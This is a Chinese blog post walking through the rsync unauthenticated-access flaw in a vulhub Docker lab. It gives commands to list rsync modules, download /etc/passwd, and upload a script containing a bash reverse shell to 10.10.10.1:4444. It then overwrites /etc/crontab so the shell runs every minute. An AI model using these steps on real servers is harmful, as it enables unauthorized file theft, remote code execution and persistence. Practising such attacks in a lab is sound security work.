rsync 未授权访问漏洞

rsync 未授权访问漏洞

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,将可以读写目标服务器文件。

漏洞测试

cd vulhub/rsync/common
docker-compose build
docker-compose up -d

环境启动后,用rsync命令访问:

rsync rsync://10.10.10.8:873/

可以查看模块名列表:
img
如上图,有一个src模块,我们再列出这个魔抗下的文件:

rsync rsync://10.10.10.8:873/src/

img
这是一个Linux根目录,可以下载任意文件:

rsync -av rsync://10.10.10.8:873/src/etc/passwd ./

img
或者写入任意文件:

cat > shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.1/4444 0>&1

chmod +x shell

rsync -av shell rsync://10.10.10.8:873/src/tmp/shell

rsync rsync://10.10.10.8:873/src/tmp/

下载定时文件crontab

rsync -av rsync://10.10.10.8:873/src/etc/crontab ./

编辑crontab文件并保存退出(每隔1分钟运行一次脚本),并上传

cat crontab
rsync -av crontab rsync://10.10.10.8:873/src/etc/crontab

img

img

posted @ 2024-05-20 11:20  kalixcn  阅读(65)  评论(0编辑  收藏  举报